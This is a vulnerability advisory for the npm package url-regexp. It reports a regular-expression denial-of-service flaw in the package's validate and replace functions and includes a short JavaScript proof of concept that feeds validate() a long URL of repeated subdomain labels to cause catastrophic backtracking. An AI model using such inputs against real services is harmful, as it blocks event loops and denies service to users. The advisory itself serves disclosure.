url-regexp
summary
Regular Expression Denial of Service (ReDoS)
affected versions
*
severity
7.5

Overview

RegExp object to match and validate URL(s).

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). An attacker who supplies a long URL to the `validate` or `replace` function can trigger catastrophic backtracking in the package's regular expression, blocking the event loop and causing a denial of service.

PoC

// PoC: validate() is called with a URL made of many repeated subdomain labels;
// the package's regular expression backtracks on this input and blocks the event loop.
var regex = require("url-regexp");
console.time("validate");
regex.validate(
  "http://huntr.dev.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312.test21312312"
);
console.timeEnd("validate"); // elapsed time grows sharply as more labels are appended
